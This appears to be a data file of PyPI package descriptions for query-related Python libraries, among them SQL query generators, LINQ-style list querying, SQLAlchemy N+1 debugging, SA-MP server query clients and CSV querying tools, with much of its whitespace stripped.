structure:payment_service\n|__ queries\n |__ payment.py\n |__ withdrawal.py\n|__ payment.py\n|__ withdrawal.py\n|__ __init__.py\ndelivery_service\n|__ queries\n |__ delivery.py\n |__ product.py\n|__ delivery.py\n|__ product.py\n|__ __init__.pyIf not specified, files will be placed under the same directory as the source file, but with_queriespostfix appended.The previously mentioned structure would become:payment_service\n|__ payment.py\n|__ payment_queries.py\n|__ withdrawal.py\n|__ withdrawal_queries.py\n|__ __init__.py\ndelivery_service\n|__ delivery.py\n|__ deliviry_queries.py\n|__ product.py\n|__ product_queries.py\n|__ __init__.pyYou can change the naming behavior by overridingQuerky#generate_filename.Custom Database Typesasyncpgtype_mapperIf you define custom types in yourpostgresdatabase,\nyou should also put conversions into theAsyncpgNameTypeMapperobject using theset_mappingmethod,\notherwisequerkywouldn't know about them.asyncpg's basic conversions are definedhere.These are all availableasyncpgdefault types:@qrk.query(shape='one',optional=False)defall_default_types():returnf'''SELECTNULL::INTEGER[] AS _anyarray,NULL::TSRANGE AS _anyrange,NULL::NUMMULTIRANGE AS _anymultirange,NULL::RECORD AS _record,NULL::VARBIT AS _bitstring,NULL::BOOL AS _bool,NULL::BOX AS _box,NULL::BYTEA AS _bytes,NULL::TEXT AS _text,NULL::CIDR AS _cidr,NULL::INET AS _inet,NULL::MACADDR AS _macaddr,NULL::CIRCLE AS _circle,NULL::DATE AS _date,NULL::TIME AS _time,NULL::TIME WITH TIME ZONE AS _timetz,NULL::INTERVAL AS _interval,NULL::FLOAT AS _float,NULL::DOUBLE PRECISION AS _double_precision,NULL::SMALLINT AS _smallint,NULL::INTEGER AS _integer,NULL::BIGINT AS _bigint,NULL::NUMERIC AS _numeric,NULL::JSON AS _json,NULL::JSONB AS _jsonb,NULL::LINE AS _line,NULL::LSEG AS _lseg,NULL::MONEY AS _money,NULL::PATH AS _path,NULL::POINT AS _point,NULL::POLYGON AS _polygon,NULL::UUID AS _uuid,NULL::TID AS 
_tid'''@dataclass(slots=True)classAllDefaultTypes:_anyarray:list[int]_anyrange:_Range_anymultirange:list[_Range]_record:_Record_bitstring:_BitString_bool:bool_box:_Box_bytes:bytes_text:str_cidr:Union[IPv4Network,IPv6Network]_inet:Union[IPv4Interface,IPv6Interface,IPv4Address,IPv6Address]_macaddr:str_circle:_Circle_date:datetime.date_time:datetime.time_timetz:datetime.time_interval:datetime.timedelta_float:float_double_precision:float_smallint:int_integer:int_bigint:int_numeric:Decimal_json:str_jsonb:str_line:_Line_lseg:_LineSegment_money:str_path:_Path_point:_Point_polygon:_Polygon_uuid:UUID_tid:tupleParameter Substitutionquerkynever uses string concatenation to put arguments into a query. SQL injection is impossible.What it does instead is create a parametrized query based on yourContract(database driver)\nand your decorated function's signature.You can make sure by checking out any of your queries'sqlfield -\nit contains the actual SQL query that will always be used for this particularQueryobject.The core of parameter substitution are theParamMapperandMappedParamclasses.When a function is decorated with@qrk.query, it gets wrapped with aQueryobject.TheQueryobject in turn calls the function inside its__init__method with all arguments\nsubstituted withMappedParamobjects generated by yourContractbackend'sParamMapperobject. EachParamMapperobject is unique per query.The f-string gets run and theMappedParamobjects \"remember\" the positions of the arguments inside the query.After that theParamMapperobject is always ready to remap any incoming arguments into your database driver's format, since it knows the signature of the function, the order of arguments and which arguments they were.Query \"compilation\"Once you run thequerky_gen.pyscript, all the queries arePREPAREd against the DBMS to\nlet it infer the types and check the correctness of the queries.\nYou can call it a kind of \"compilation step\".\nWhich, by the way,conveniently checks query correctness before the program is run, meaning, that if you have\na syntax error, the DBMSitselfwill tell you that, before you ship your code.Tips and TricksUsing ORM models for schema hintingI personally found it very convenient to use ORM models to have\na copy of the expected database schema state.This way you can use the linter to your advantage when refactoring code: e.g. if a column gets dropped,\nthe linter will be screaming \"this field does not exist\" for every query you used it in.I suggest exploring thesqlacodegenpackage to tackle the issue.Code generation is not requiredQueryobjects are actually callable, if you look at the sample generated code. 
So, you don't need the code generation\nprocedure to use the argument mapping capabilities of this package.Issues, Help and DiscussionsIf you encountered an issue, you can leave it here, on GitHub.If you want to join the discussion, there are Telegram chats:English Language Chat \ud83c\uddfa\ud83c\uddf8\ud83c\uddec\ud83c\udde7Russian Language Chat \ud83c\uddf7\ud83c\uddfaIf you need to contact me personally:Email:verolomnyy@gmail.comTelegram:@datscrazyLicenceMIT License\n\nCopyright (c) 2023 Andrei Karavatski"} +{"package": "querpyable", "pacakge-description": "QuerpyableA Python implementation of LINQ:bulb: ExampleCalculating the first 10000 primesQueryable\\.range(2,1_000_000)\\.where(lambdan:all(n%i!=0foriinrange(2,int(n**0.5)+1)))\\.take(10000):cd: InstallationpipinstallquerpyableIn order to locally set up the project please follow the instructions below:# Set up the GitHub repositorygitinit\ngitconfig--localuser.nameVasilisSioros\ngitconfig--localuser.emailbillsioros97@gmail.com\ngitadd.\ngitcommit-m\"feat: initial commit\"gitremoteaddoriginhttps://github.com/billsioros/querpyable# Create a virtual environment using poetry and install the required dependenciespoetryshell\npoetryinstall# Install pre-commit hookspre-commitinstall--install-hooks:book: DocumentationThe project's documentation can be foundhere.:heart: Support the projectFeel free toBuy me a coffee! \u2615.:sparkles: ContributingIf you would like to contribute to the project, please go through theContributing Guidelinesfirst.:label: CreditsThis project was generated withbillsioros/cookiecutter-pypackagecookiecutter template."} +{"package": "query", "pacakge-description": "queryis a simple module for quickly, interactively exploring a SQL\ndatabase. Together with IPython, it supports quick tab-completion of table\nand column names, convenience methods for quickly looking at data (e.g.,.head(),.tail()), and the ability to get a rich interactive database\nconnection up in only 2 lines by setting a few required environmental\nvariables.Demo in 2 linesExplore the included demo database:fromqueryimportQueryDbdb=QueryDb(demo=True)Real-world use case in 2 linesOr set a few environmental variables (QUERY_DB_DRIVER,QUERY_DB_HOST,QUERY_DB_PORT,QUERY_DB_NAME, andQUERY_DB_PASS) and get started just as quickly:fromqueryimportQueryDB# capital 'B' is OK too :)db=QueryDB()Interactive exampleLinksCode and additional details on Github:"} +{"package": "queryable", "pacakge-description": "MemDBSQLite in-memory database without the boilerplateIf you know would like to work with a SQL-based data structure\nin memory, this module makes your life as easy as possible"} +{"package": "queryable-list", "pacakge-description": "python-queryable-listForget classical list filtering and enjoy yourself by generating flexible and\nfluent list queries with QueryableList.What is the purpose?List filtering sometimes may be difficult and boring especially when you\nneed to apply consecutive filters. This library is inspired by flexibility\nof Django ORM and LinQ. 
I also believe it looks more readable to write\nall filters in the same context.Let's assume we have a list named numbers that contains duplicated numbers,\nand we need to use a filter that is so:max(list(set(filter(lambdax:x>20,numbers)))[11:])Maybe you think I exaggerated but real life problems can even be more confusing.Let's assume the number is a QueryableList.\nThe above filter can be rewritten readable such that with QueryableList:numbers.filter(lambdax:x>20).distinct().skip(11).max()Also your queries will be reusable because QueryableList works lazy:persons=[{'first_name':'John','last_name':'Doe','age':22},{'first_name':'John','last_name':'Smith','age':33},...]query=QueryableList(persons).select('last_name','age')query2=query.select_list('age',flat=True)query3=query.select_list('last_name')print(list(query))print(list(query2))print(list(query3))# Outputs# [{'last_name': 'Doe', 'age': 22}, {'last_name': 'Smith', 'age': 33}]# [22, 33]# [['Doe'], ['Smith']]All the queries don't work in their building step as you can see . They\nworked at the time they were called via list(). In this wayquerycould\nbe used to buildquery2andquery3queries.Which Python versions are supported?Python 2.7 and Python 3.5+ versions are supported. A lot of unit tests are\nwritten to consider all the cases on different Python versions.Installationpipinstallqueryable-listRunning TestsRun this command by using your virtual environment.python-munittestdiscover"} +{"package": "queryandprocessdata", "pacakge-description": "Proteus genProcess File"} +{"package": "queryandprocessdatautility", "pacakge-description": "Proteus genProcess File"} +{"package": "query-anon", "pacakge-description": "A tool to anonymize SQL queries."} +{"package": "query-blockchain-state-lib", "pacakge-description": "Query Blockchain State LibThis repo is inherited fromQueryStateLibInstallpip3 install query-blockchain-state-libExample do query state batch at clientExample usedGithub :https://github.com/Centic-io/query-blockchain-state-libUseEthereum Json-pcBaseUse Ethereum JSON-RPC call to interact with EVM node providerPostman usage:Link"} +{"package": "querybuilder", "pacakge-description": "For the following Table example:CREATETABLEarticle(idintegerNOTNULL,createdtimestampwithouttimezoneNOTNULL,titlecharactervarying(255)NOTNULL,type_idintegerNOTNULL,topic_idintegerNOTNULL,author_idsinteger[]NOTNULL,category_idsinteger[],tagscharactervarying(255)[],keywordscharactervarying(255)[],summarytext,contenttextNOTNULL,coverjsonbNOTNULL,editors_pickbooleanNOTNULL,pageviewsbigintNOTNULL,updatedtimestampwithouttimezoneNOTNULL,publishedtimestampwithouttimezone,permalinkcharactervarying(255),cust_metajsonb);SpecificationsFor all articles withtype_idequal to1(type_id = 1):json { \"EQ\": { \"type_id\": 1 } }Same structure is\nfor:ConditionJSON KEYSymbolJSON QueryLess thanLT<{\"LT\": {\"type_id\": 2}}Less than or Equal toLE<={\"LE\": {\"type_id\": 2}}Greater thanGT>{\"GT\": {\"type_id\": 2}}Greater than or Equal toGE>={\"GE\": {\"type_id\": 2}}Not equalNE!={\"NE\": {\"type_id\": 2}}INFor all articles wheretype_idis in[1, 2, 3], the JSON query\nwill be:{\"IN\":{\"pageviews\":[1,2,3]}}BETWEENFor all articles withpageviewsbetween 10000 and 15000, the JSON\nquery will be:{\"BETWEEN\":{\"pageviews\":[10000,15000]}}CONTAINS_ANYFor all articles whereauthor_idscontains any of8, 9, 10, the\nJSON query will be:{\"CONTAINS_ANY\":{\"author_ids\":[8,9,10]}}CONTAINS_ALLFor all articles whereauthor_idscontains all of8, 9, the JSON\nquery will 
be:{\"CONTAINS_ALL\":{\"author_ids\":[8,9]}}STARTSWITHFor all articles wheretitlestarts withFilm Review, the\nJSON query will be:{\"STARTSWITH\":{\"title\":\"Film Review\"}}Complex QueriesComplex queryies can contain nested structures ofORorANDor both.For all articles withpageviewsbetween 10000 and 15000 and whoseauthor_idscontains8(the author\u2019s ID) (in above schema,author_idsis an ArrayField in Postgres), the JSON query will be:{\"AND\":[{\"BETWEEN\":{\"pageviews\":[10000,15000]}},{\"CONTAINS\":{\"author_ids\":[8]}}]}RequirementsIf there is only one condition, likepageviews> 100, the query\ncan directly contain outermost key as one ofEQ, NE, GT, GE, LT, LE, STARTSWITH, CONTAINS, CONTAINS_ALL, CONTAINS_ANY, BETWEEN.example:{\"STARTSWITH\":{\"title\":\"Film Review\"}}But if there are more conditions involved, the outermost key must be\none of `OR"} +{"package": "query-builder", "pacakge-description": "No description available on PyPI."} +{"package": "query-chain", "pacakge-description": "No description available on PyPI."} +{"package": "querychart-package", "pacakge-description": "querychartsql graphs based on matplotlibinstall matplotlibpip install matplotlibmarker refhttps://www.w3schools.com/python/matplotlib_markers.asp"} +{"package": "query-cli", "pacakge-description": "# queryThis is a simple, yet powerful command line translator with baidu translate\u547d\u4ee4\u884c\u4e0b\u7ffb\u8bd1\u5de5\u5177\uff0c\u7ffb\u8bd1\u670d\u52a1\u57fa\u4e8e\u767e\u5ea6\u7ffb\u8bd1https://github.com/yangyang-zhang/query## install \u5b89\u88c5pip install query-cli## Usage \u7528\u6cd5### English To Chinese\uff08\u82f1\u6587\u7ffb\u8bd1\u4e2d\u6587\uff09```query apple******************************apple:\u82f9\u679c*****************************```### Chinese To English\uff08\u4e2d\u6587\u7ffb\u8bd1\u82f1\u6587\uff09```query -t en \u82f9\u679c******************************\u82f9\u679c:Apple*****************************```> \u76ee\u6807\u7ffb\u8bd1\u8bed\u8a00\u652f\u6301\u82f1\u8bed\u3001\u65e5\u8bed\u3001\u5fb7\u8bed\u7b49\u51e0\u5341\u79cd\u8bed\u8a00\uff0c\u7528 -t \u6307\u5b9a\u7ffb\u8bd1\u76ee\u6807\u8bed\u8a00\u5373\u53ef### Chinese To Japan\uff08\u4e2d\u6587\u7ffb\u8bd1\u65e5\u6587\uff09```query -t jp \u6211\u662f\u8c01******************************\u6211\u662f\u8c01:\u79c1\u306f\u8ab0\u3067\u3059\u304b*****************************```## query \u4f5c\u4e3a\u4e00\u4e2a\u6a21\u5757\u5bfc\u5165>\u9ed8\u8ba4\u7ffb\u8bd1\u4e3a\u4e2d\u6587,\u7b2c\u4e8c\u4e2a\u53c2\u6570\u4e3a\u7ffb\u8bd1\u76ee\u6807\u8bed\u8a00```>>> from query import Query>>> q = Query('apple')>>> q.translate()apple:\u82f9\u679c{'src_result': 'apple', 'trans_result': '\u82f9\u679c'}>>> q = Query('english', 'wyw')>>> q.translate()english:\u82f1\u5409\u5229\u8bed{'src_result': 'english', 'trans_result': '\u82f1\u5409\u5229\u8bed'}```"} +{"package": "query-client", "pacakge-description": "Query ClientThis is a simple client to query.example\u521d\u59cb\u5316\u5ba2\u6237\u7aef\u53ca\u5143\u6570\u636efromquery_clientimportQueryClientqc=QueryClient()tables=qc.get_meta()# print(tables) \u83b7\u53d6\u5168\u90e8\u53ef\u67e5\u8868,\u53ca\u5176coloumns, \u5143\u6570\u636e## \u76ee\u524d\u53ea\u6709\u4e24\u4e2a\u76f8\u5173\u8868\u6ce8\u518ccan_table=tables[\"can_detail\"]pcd_table=tables[\"pcd_label_desc\"]fetchpythonfromsqlalchemy.sql.expressionimportselect,text,and_fromquery_clientimportQueryClientimportpandasaspdqc=QueryClient()tables=qc.get_meta()mytable=tables[\"pcd_label_desc\"]# 1. 
fetch_by_stmt \u521d\u59cb\u5316 statement, select/where/group_bystmt=select(mytable.c.dataset,mytable.c.batch_path,text(\"array_distinct(categories) scenes\"),text(\"cardinality(filter(categories, x -> x IN ('car'))) as target_cnt\"))r=qc.fetch_by_stmt(stmt)df=pd.DataFrame(r)# 2. fetch_by_sqlquery=\"select * from pcd_label_desc limit 10\"r=qc.fetch_by_sql(query)df=pd.DataFrame(r)\u5177\u4f53\u793a\u4f8b\u57ce\u533a\u573a\u666f\u7684\u7b5b\u9009\u5b9a\u4e49\u5355\u5e27\u6307\u6807(\u5404\u79cd\u76ee\u6807\u6570)group by \u5e8f\u5217fetch_by_sql \u5b9e\u73b0\u65b9\u5f0fcte \u8bed\u6cd5:t \u8868\u67e5\u8be2\u5355\u5e27\u7684\u53bb\u91cd\u573a\u666f\u3001\u4e0d\u540c\u7c7b\u578b\u7684\u76ee\u6807\u6570\u6307\u6807\uff0cdataset \u53cabatch \u7ef4\u5ea6\u5229\u7528 t \u8868\u7684dataset, batch_path \u7ef4\u5ea6\u805a\u5408\u6307\u6807code examplequery=\"\"\"WITH t AS (SELECTdataset,batch_path,array_distinct(categories) scenes,cardinality(filter(categories,x -> x IN ('car','van','truck','mini_truck','special_truck','truck','cyclist','bicycle','pedestrian'))) AS target_cnt,cardinality(filter(categories,x -> x IN ('truck','mini_truck','special_truck'))) truck_cnt,cardinality(filter(categories, x -> x IN ('car', 'van'))) carvan_cnt,cardinality(filter(categories, x -> x = 'pedestrian')) pedestrian_cnt,cardinality(filter(categories, x -> x IN ('cyclist', 'bicycle'))) cyclist_cntFROMpcd_label_descWHEREdelivery_date = '20230310'AND any_match(road_condition,x -> x = 'highway_road'))SELECTdataset,batch_path,array_distinct(FLATTEN(ARRAY_AGG(scenes))) scenes,SUM(target_cnt) target_cnt,SUM(carvan_cnt) carvan_cnt,SUM(pedestrian_cnt) pedestrian_cnt,SUM(truck_cnt) truck_cnt,SUM(cyclist_cnt) cyclist_cntFROMtGROUP BY1,2ORDER BYtarget_cnt DESC\"\"\"r=qc.fetch_by_sql(query)df=pd.DataFrame(r)fetch_by_stmt \u5b9e\u73b0\u65b9\u5f0fmytable=tables[\"pcd_label_desc\"]stmt=select(mytable.c.dataset,mytable.c.batch_path,# \u6307\u5b9atable\u805a\u5408\u7684\u7ef4\u5ea6text(\"cardinality(filter(categories, x -> x IN ('car', 'van'))) carvan_cnt\"),# \u5b9a\u4e49\u51fd\u6570\u53d8\u6362\u6307\u6807# ... 
goon).where(and_(mytable.c.delivery_date==\"20230310\",text(\"any_match(road_condition, x -> x = 'city_road')\")# \u8fc7\u6ee4\u57ce\u533a\u573a\u666f))# \u6307\u6807cte \u8868cte=qc.with_cte(stmt)# \u7ee7\u7eed\u805a\u5408stmt2=select(cte.c.dataset,cte.c.batch_path,text(\"SUM(carvan_cnt) carvan_cnt\")).group_by(cte.c.dataset,cte.c.batch_path)# \u67e5\u8be2\u7ed3\u679cr=qc.fetch_by_stmt(stmt2)df=pd.DataFrame(r)"} +{"package": "query-client-silverbullet-s", "pacakge-description": "GTA SA-MP clientRCON and query client library for PythonA modern Python library for querying and managing SA-MP servers.Supported Python version 2.7, 3.4, 3.5 and 3.6Installationpipinstallsamp-client-esUsageThe library can be easily interfaced using a singleSampClientclass:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777)asclient:printclient.get_server_info()The library also allows you to run RCON commands as well as queries:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777,rcon_password='password')asclient:client.rcon_cmdlist()Query and RCON responses are parsed into native Python structures:fromsamp_client.clientimportSampClientwithSampClient(address='localhost',port=7777,rcon_password='password')asclient:info=client.get_server_info()printinfo# ServerInfo(password=True, players=9, max_players=100, hostname='Convoy Trucking', gamemode='Convoy Trucking 3.1.1', language='English')printinfo.gamemode# 'Convoy Trucking 3.1.1'printclient.rcon_get_hostname()# ServerVar(name='hostname', value='Convoy Trucking', read_only=False)printclient.rcon_players()[0].ping# 26ExamplesFolderexample/contains usage example of the libraryRunning testsTo run tests:python-munittestdiscover-v"} +{"package": "query-collections", "pacakge-description": "A set of classes that makes managing JSON objects easier within Python (and more?)Why?When wanting to access an index of a JSON object (or a Python\ndictionary/map), we need to use [\u2018member\u2019] syntax. This is ok for simple\nJSON objects, but let\u2019s say you had a complex object andyou wanted a\ndeeply nested element, such as:dict_instance['member'][0]['items'][0]['id']This is where query collections come in. Right now the supported\nstructures are maps (python dictionaries) and lists. Here is how we can\naccess the members in each:Given a k:v map:{\n \"population\": {\n \"faculty\": [\n {\n \"id\": \"103902\",\n \"name\": \"Cory\",\n \"field\": \"CS\"\n },\n {\n \"id\": \"6789\",\n \"name\": \"Ted\",\n },\n {\n \"id\": \"67874\",\n \"name\": \"Mike\",\n \"field\": \"CS\"\n }\n ],\n \"count\": 3,\n \"access_codes\": [\n 1, 2, 3\n ]\n }\n}This specific instance would be rather difficult to obtain information\nfrom, and would require a lot of generators and other unnecessary bloat\nto achieve a task as simple as \u201cif there are any users who are faculty,\nreturn those with a \u2018field\u2019 specifiedHere is the naive solution with regular builtin Python functionality:json_obj = ...\nif json_obj.get('population').get('faculty') is not None:\n matches = [f_member for f_member in json_obj['population']['faculty'] if 'field' in f_member]\n return matches\nreturn None_Here is how we can perform the same operation with a query_dict:json_obj = query_dict(...)\nmatches = json_obj.query(\"population:faculty:*:field!\")In this example,*denotes \u201cany member of the list faculty\u201d, and!means \u2018return true if field exist`. 
The wildcard operator, by\ndefault, returns any member who returns a value.SyntaxThe syntax for queries is very easy to understand! To access a nested\nmember of a parent, simply do: parent:child. This can be chained over\nany amount of nesting. Of course this is in itself useful, but with the\naddition of operators, the use case is much, much more clear!Acceptable operators: -*: Wildcard operator. Returns the list of\nelements at the given index. -!: Exists operator. Returns true if\nthe member exists.Combination of rules is also acceptable: - The wildcard by default stops\nerror reporting and returns all matching elements following itself in\nthe query string. For example: .query(\u201d*:id!\u201d) returns all members of\nthe first level where id exists. We can also perform queries by using the\nindex operators and prefixing a question mark.FilteringAs of release 0.0.1.2a8, we can now filter lists to search for children\nthat meet certain filters. This is a simple implementation,\nbut should meet demands for this use case. Storing values inside a string\nwas not an idea I supported (i.e., performing \u201ceq=13\u201d), and as such,\nfilters are added an extension to the query method. You can either pass a\nsingle filter, or multiple (as an array), and filters can be accesed within\nthe query string with the \u2018$\u2019 operator, which follows this syntax: member$filterIndex.\nIf you only have one filter, there is no need to do member$0, you can simply do: member$\nExample:For a problem, we need to filter a list of students to find students with a GPA > 3.0.\nIt is simply done as:results = students.query(\"*:GPA$\", filters.greaterEqual(3.0))\n# returns list of students with GPA > 3.0Multiple queries (to find list of students where GPA > 3.0 and attendance > 90.0:results = students.query(\"*:GPA$0:*:ATTENDANCE_PCT$1\",\n filters.greaterEqual(3.0), # filter at index '$0'\n filters.greaterEqual(90.0) # filter at index '$1'\n)\n # returns list of students with GPA > 3.0 and attendance > 90.0StreamsAs of release 0.0.1a3, the Stream class is now in beta. This is a copy of the\nJava 8 Stream API and nearly all functionality exists. You can create your own\nstream from your own type easily, and query_dict and query_list contain a method\nto create the stream.results = Stream.of(1,2,3,4,5,6,7,8,9,10)\nresults.filter(lambda x: x > 5)\\\n .peek(lambda x: print(x))\n\nOUT:\n 6\n 7\n 8\n 9\n 10Examples:You may find a list of query examples in the /test directory. This\nincludes all current combinations of operators and basic error checking.query_dict and query_listCurrently this is all implemented through classes that inherit the dict\nand list class. 
The only additional functionality of these classes are\ndot access of dictionary members and a \u2018length\u2019/\u2019len\u2019 property of lists.query_dictMembers of the dictionary can be accessed from the dot operator:>>> obj = query_dict({_\n \"name\": \"Cory\",\n \"stats\": {\n \"coolness\": \"over9000\"\n }\n })\n>>> obj.name\n\"Cory\"\n>>> obj.stats.coolness\n\"over9000\"query len/length>>> mlist = query_list([1,2,3])\n>>> mlist.len\n3\n>>> mlist.length\n3Roadmap:Equality operator for basic comparisonsEquality comparatorLicenseQuery Collections\n\nThe MIT License (MIT)\n\nCopyright (c) 2016 Cory Forward\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE."} +{"package": "querycolumns", "pacakge-description": "querycolumnSimple extension toPandasthat makes it easier to select columns in (very)wideDataFrames. If you name your columns in a hierarchical fashion with a separator (e.g, as you might get frompd.normalize_json(), it lets you select a column or group of columns easily and with tab completion.Here's a quick demo of what this looks like.>>> import pandas as pd\n >>> from querycolumn import patch_dataframe_with_query_columns\n >>> patch_dataframe_with_query_columns()\n >>> df = pd.DataFrame([{'person.size.height': 3, 'person.size.weight': 4}])\n >>> df.qc.person\n \n >>> df.qc.person.size\n \n >>> df.qc.person.size.weight\n 0 4\n Name: person.size.weight, dtype: int64\n >>> df[df.qc.person.size]\n >>>QueryColumns does its magic by patching aDescriptorinto theDataFrameclass. When you retrieve the attributeqcfrom a frame, `QueryColumns.get()' is invoked; this is when QueryColumns introspects its parent dataframe and returns a magical object with tab completion for segmented column names.Note I wrote QueryColumns after working with Pandas for about a week. I don't know if it encourages elegant use of the library, but I find it useful for my usecase. I'm practically certain that it doesn't extend Pandas as one should (there areexplicitAPIs for that), but I couldn't think of a way to do it without the Descritor protocol."} +{"package": "querycontacts", "pacakge-description": "querycontacts - Query Abuse ContactsInstallationpip install querycontactsStarting with version 2.0.0 support for python 2.7 is dropped. 
This is related to dnspython 2.0.0 also dropping support.Command line usageusage: querycontacts [-h] [--provider PROVIDER] [--version] ip\n\nQueryContact - Find the Abuse contact for a IP address\n\npositional arguments:\nip query network abuse contacts for a given ip address\n\noptional arguments:\n-h, --help show this help message and exit\n--provider PROVIDER change standard network abuse contacts provider.\n Defaults to abuse-contacts.abusix.zone\n--version show program's version number and exitExamplesShow version:$ querycontacts --version\nquerycontacts 2.0.0Show abuse contact for your IP:$ IP=$(curl ipecho.net/plain)\n$ querycontacts $IP\nabuse@yourisp.example.comTest response for localhost:$ querycontacts 127.0.0.1\nAbusix ContactDB Test pointLibrary usage>>> from querycontacts import ContactFinder\n>>> qf = ContactFinder()\n>>> qf.find('127.0.0.2')\n['root@localhost', 'abuse@localhost']\n\n>>> qf.find('::ffff:7f00:2')\n['root@localhost']"} +{"package": "queryConverterRusab", "pacakge-description": "No description available on PyPI."} +{"package": "query-counter", "pacakge-description": "QueryCounterSQLAlchemy model N+1 debugger.NOTE: This is a debugging tool that is not meant to be deployed in production.AboutThis module will help identify N+1 DB calls made through SQLAlchemy. It takes advantage of the SQLAlchemy event listener fordo_orm_execute.QueryCounter will provide insights into which model DB calls are made multiple times, with optional tracebacks and heuristics to determine where these calls originate.By default, QueryCounter will log results with an optional config to raise an Exception.Installationpipinstallquery-counterUsageUsage: Create QueryCounter with a SQLalchemy session, an optional config, andinitializewhen you would like to start tracking requests:fromquery_counterimportQueryCounterquery_counter=QueryCounter(session=session)query_counter.initialize()Runanalyzeto dig into queries that ran since initialization:query_counter.analyze()This also works as a context manager:withQueryCounter(session=session,config=QueryAnalysisConfig(alert_threshold=0))ascounter:session.query(User).first()counter.analyze()Setting a breakpoint in the analyze function will allow you to inspect\nall of the queries and their stack traces.ConfigurationQueryCounteraccepts an optionalconfigkwarg of typeQueryAnalysisConfig.QueryAnalysisConfigis a dataclass with the following specifications/defaults:# QueryCounter analyze will not log or raise exceptions if the number# of duplicated DB calls is less than the alert_thresholdalert_threshold:int=10# QueryCounter analyze will raise an exception if Trueraise_if_exceeds:bool=False# QueryCounter analyze will info log if no DB calls# exceed the thresholdlog_no_alert:bool=False# QueryCounter will store the stacktrace relevant to the DB calltraceback_enabled:bool=False# QueryInstance will inspect frames and filter the stack down# to codepaths specified in heuristic_pathsheuristics_enabled:bool=False# Requires heuristics_enabled=True - filters stack down to# these codepathsheuristic_paths:list=field(default_factory=list)TODOLintingTestsPipelineLicenseQueryCounter is distributed under the MIT License."} +{"package": "querycsv", "pacakge-description": "querycsv.pyis a Python module and program\nthat executes SQL code against data contained in one or more\ncomma-separated-value (CSV) files. 
The output of the SQL query will be\ndisplayed on the console by default, but may be saved in a new CSV file."} +{"package": "querycsv-redux", "pacakge-description": "querycsv.pyis a Python module and program\nthat executes SQL code against data contained in one or more\ncomma-separated-value (CSV) files. The output of the SQL query will be\ndisplayed on the console by default, but may be saved in a new CSV file."} +{"package": "query-diet", "pacakge-description": "No description available on PyPI."} +{"package": "query-doc", "pacakge-description": "Query Doc PackageA small package that allows you to break your query in manageable chunks (normally fields), allowing you to focus on building each variable / field independently, with notes / documentation and at the end cam be compiled to a single gigantic query string that otherwise would be impossible to manage or maintainfromquery_docimportQueryDocInstantiateqd=QueryDoc({})ADD FIELDSFIELD A_field=qd.field()_field.name='FieldA'_field.desc='FieldA description'_select=f\"\"\"SELECT \"TABLE_A\".\"FILED_A\" AS \"{_field.name}\"\\n\"\"\"_field.select=_select_field.from_=f\"\"\"FROM \"TABLE_A\"\\n\"\"\"_where=f\"\"\"WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULLAND \"TABLE_A\".\"DATE_FIELD\" = '{{YYYY-MM-DD}}'\\n\"\"\"_field.where=_whereqd.add_field(_field)FIELD B_field=qd.field()_field.name='FieldB'_field.desc='FieldB description'_select=f\"\"\" , \"TABLE_B\".\"FILED_B\" AS \"{_field.name}\"\\n\"\"\"_join=f\"\"\"LEFT OUTER JOIN (SELECT *FROM \"TABLE_B\") AS \"TABLE_B\" ON (\"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\")\\n\"\"\"_field.select=_select_field.join=_joinqd.add_field(_field)CONCAT FIELD A & B_field=qd.field()_field.name='FieldA+FieldB'_field.desc='FieldA Concat FieldB description'_select=f\"\"\" , (COALESCE(@FieldA, '') || COALESCE(@FieldB, '')) AS \"{_field.name}\"\\n\"\"\"_field.select=_selectqd.add_field(_field)GET QUERY PARTS DICTquery_parts=qd.get_query_parts()print(query_parts){'FieldA': {'name': 'FieldA', 'desc': 'FieldA description', 'select': 'SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\\n', 'from_': 'FROM \"TABLE_A\"\\n', 'join': None, 'where': 'WHERE \"TABLE_A\".\"COND_FIELD_A\" IS NOT NULL \\n AND \"TABLE_A\".\"DATE_FIELD\" = \\'{YYYY-MM-DD}\\'\\n', 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}, 'FieldB': {'name': 'FieldB', 'desc': 'FieldB description', 'select': ' , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\\n', 'from_': None, 'join': 'LEFT OUTER JOIN (\\n SELECT *\\n FROM \"TABLE_B\"\\n) AS \"TABLE_B\" ON (\\n \"TABLE_B\".\"FK_FROM_A\" = \"TABLE_A\".\"KEY_FIELD\"\\n AND \"TABLE_B\".\"DATE_FIELD\" = \"TABLE_A\".\"DATE_FIELD\"\\n)\\n', 'where': None, 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}, 'FieldA+FieldB': {'name': 'FieldA+FieldB', 'desc': 'FieldA Concat FieldB description', 'select': ' , (@FieldA || @FieldB) AS \"FieldA+FieldB\"\\n', 'from_': None, 'join': None, 'where': None, 'group_by': None, 'order_by': None, 'having': None, 'window': None, 'extras': None, 'active': True}}GET QUERY STRING (SQL)sql=qd.get_query_sql(None)print(sql){'name': None, 'desc': None, 'select': 'SELECT \"TABLE_A\".\"FILED_A\" AS \"FieldA\"\\n , \"TABLE_B\".\"FILED_B\" AS \"FieldB\"\\n , ((\"TABLE_A\".\"FILED_A\") || ( 